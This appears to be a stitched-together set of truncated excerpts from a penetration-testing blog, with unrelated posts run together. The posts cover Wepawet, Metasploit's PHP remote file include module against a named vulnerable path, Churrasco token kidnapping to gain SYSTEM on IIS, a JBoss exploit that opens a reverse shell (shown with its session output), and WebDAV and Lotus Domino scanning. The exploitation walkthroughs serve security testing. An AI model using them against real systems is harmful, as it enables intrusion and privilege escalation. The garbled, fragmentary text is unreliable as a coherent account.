Hi dudes,

You could find a new paper describing the design of Wepawet. One of my research mate, Daniel, asked the first author about the deobfuscation part. He said "We do some analysis to recover the clear text of the code. For example, we save the parameters passed to eval and document.write, which is often sufficient to deobfuscate the code. However, we don't currently handle more sophisticated obfuscation techniques (e.g., replace-based ones).". It may be the reason why it may not detect the crimeware.

Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code

Abstract:

It is my first post at AttackResearch and I should be thankful to Val and his mates to grant me this opportunity to show you more China-specific threats, attacks and tricks here in the future. I believe you guys should enjoy it.

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use, set your normal RHOST/RPORT options, set the PATH and set your PHPURI with the vuln path and put XXpathXX where you would normally your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

/[path]/slogin_lib.inc.php?slogin_path=[remote_txt_shell]

and make your PHPURI

PHPURI /slogin_lib.inc.php?slogin_path=XXpathXX

let's see it in action

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name Rank Description
---- ---- -----------

Back in 09 there was a buzz about token kidnapping by Argeniss
http://www.argeniss.com/research.html

http://www.argeniss.com/research/TokenKidnapping.pdf

subsequently patched http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx

I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...

The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.

Lets see it in action.

MC pushed out a new exploit today (jboss_deploymentfilerrepository)

msf exploit(jboss_deploymentfilerepository) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Triggering payload at '/web-console/HYQ.jsp'...
[*] Command shell session 3 opened (192.168.1.101:4444 -> 192.168.1.101:57796) at Sun May 09 11:20:31 -0400 2010

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

I pushed out the first of a few Lotus Domino modules I've been working on to the metasploit trunk last nite.

The first one is a Lotus Domino Version Module.

There is no real "banner grabbing" for versions with Lotus Domino, old old versions "may" display the version in the server headers but I've never seen anything above 5.x do this. You usually get something like:

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Fri, 30 Apr 2010 00:19:11 GMT

intro..webdav stuff...lazy...

To get yourself a test environment you can follow this tutorial, its not bad. You'll want to make sure you pay attention to the part about allowing your IUSR_WHATEVER account to have have write access or you can set up a windows account to use authentication.

metasploit has a few modules to test for webDAV presence.

webdav_scanner:

msf auxiliary(webdav_scanner) > run

[*] 192.168.242.134 (Microsoft-IIS/6.0) has WEBDAV ENABLED
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

webdav_internal_ip

msf auxiliary(webdav_internal_ip) > run

[*] Found internal IP in WebDAV response (192.168.242.134) 192.168.242.134

I wanted to be able to view/sniff some traffic from my android phone. Mostly to see how "closed" the gowalla checkin api was (not very).

The first couple suggestions were to connect the phone to wifi and checkin. To do this from the comfort of my own home meant checking in from home and I didn't really want to do that.

Installing the android emulator is pretty straightforward, the only problem is that it doesnt come with the android market or the ability to easily(?) download apps to mess with.

After some googling I found this post:

http://tech-droid.blogspot.com/2009/11/android-market-on-emulator.html

This enabled me to get a working android emulator with android market place.

Getting IPv6 up and running

Install the miredo package:
$ sudo apt-get install miredo

After this command, you should see an IPv6 address beginning with "2001:0:" in your network settings (use 'ifconfig'). If so, you're connected to the IPv6 world.

Remove miredo system startup links:
$ sudo update-rc.d -f miredo remove

Usage:

$ sudo /etc/init.d/miredo {start|stop|restart|reload|force-reload}

If miredo is running you should have another interface called "teredo".
You can display it with the following command:

$ ifconfig teredo

Buby combines two things I use on at least every web application penetration test, if not every penetration test. Burp and Ruby.

I will assume you are familiar with both. If you aren't familiar with Burp, it's the best money you'll spend on a security tool in my opinion. So go get it, install the PortSwigger cert, tweak your config and get to work. See the end of this post for some operational Burp references.

Buby was widely introduced in the Blackhat USA 09 presentation "Ruby for Penetration Testers" by Matasano Security and is available thanks to the BurpExtender API by PortSwigger and some pretty Ruby by Eric Monti.

Depending on your platform, Buby and some of it's sample dependencies can quite literally be a pain in the ass to install, as in you could be in your seat trying to resolve dependencies for a portion of your day, so assuming you've got it running on your platform, let's talk about some of the use cases.